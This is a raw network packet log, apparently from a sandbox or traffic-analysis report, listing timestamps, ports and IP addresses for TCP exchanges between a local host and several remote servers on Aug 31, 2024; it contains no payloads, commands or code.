Aug 31, 2024 15:44:21.332196951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332207918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332222939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332231998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332240105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332243919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332256079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332266092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332274914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332278013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332288027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332293034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332298994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332309008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332319021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332319021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332323074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332351923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332365036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333555937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333575964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333584070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333607912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333621025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333642006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333652020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333661079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333668947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333678961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333689928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333695889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333703041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333714008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333720922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333724022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333750010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333769083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333775997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333786964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333796024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333806992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333816051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.333825111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.333853006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.335994959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336004972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336014986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336024046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336035013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336045027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336045980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.336057901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336066961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336076021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.336076975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336086988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336092949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.336097002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336107969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336112976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.336118937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336119890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.336131096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.336148024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.336174011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337265015 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.337327957 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.337433100 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.337440968 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.337450027 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.337460041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337471008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337481976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337493896 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.337519884 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.337522984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337538958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337564945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337575912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337584972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337594032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337599993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337620020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337650061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337762117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337771893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337776899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337785959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337795973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337805033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337814093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337829113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337837934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337843895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337847948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.337866068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.337889910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.338470936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338531971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.338651896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338660955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338670015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338679075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338689089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338696957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.338725090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.338886023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338895082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.338907003 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.338916063 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.338926077 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.338937044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.338957071 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.338967085 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.339553118 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339596033 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.339689016 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339699030 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339709044 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339719057 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339736938 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.339749098 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.339772940 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.339828014 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339843035 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.339868069 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.339879036 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.343691111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343700886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343710899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343719959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343729973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343741894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.343776941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.343861103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343871117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343879938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343888998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343898058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343907118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343907118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.343919039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.343921900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.343939066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.343952894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.344023943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.344033957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.344078064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.345624924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345633030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345642090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345680952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.345705986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.345788956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345798969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345808029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345818996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345832109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345835924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.345839977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.345864058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.345871925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.346127033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346137047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346177101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.346271992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346282005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346292019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346301079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346327066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.346350908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.346971035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.346982002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.347026110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.350871086 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:21.352988005 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:21.357870102 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:21.390506983 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.390530109 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.390541077 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.390563965 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.390589952 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.390599966 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.390603065 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.390639067 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.420599937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420609951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420629978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420639992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420650005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420651913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.420664072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420675993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.420675993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.420696020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.420716047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.421336889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421386957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.421541929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421595097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.421622038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421632051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421643019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421653032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421663046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421668053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.421674013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421684027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.421700001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.421710014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.421719074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422509909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422558069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422563076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422580004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422607899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422622919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422691107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422702074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422712088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422720909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422730923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422739029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422739029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422749996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422760010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422768116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422770023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422780991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422787905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422795057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422796965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422821999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422852039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.422928095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422939062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422949076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.422977924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.423002958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.423019886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.423028946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.423038006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.423048019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.423077106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.423109055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424274921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424324036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424331903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424372911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424460888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424472094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424484968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424494982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424504042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424515009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424516916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424526930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424535990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424536943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424551964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424555063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424581051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424607038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424680948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424691916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424701929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.424729109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.424751997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425489902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425508022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425517082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425529957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425539017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425549030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425576925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425595045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425606012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425615072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425622940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425641060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425646067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425656080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425657988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425676107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425682068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425688028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425692081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425702095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425712109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425714016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425720930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425723076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.425746918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.425766945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428311110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428319931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428340912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428349972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428361893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428364992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428371906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428383112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428390026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428405046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428406000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428421021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428426027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428431034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428450108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428451061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428462029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428467035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428473949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428484917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428489923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428499937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428503990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428513050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428523064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428553104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428919077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428968906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.428972960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428985119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.428993940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.429009914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.429027081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.429038048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.429042101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.429053068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.429060936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.429063082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.429078102 CEST	49727	80	192.168.2.5	52.212.52.84
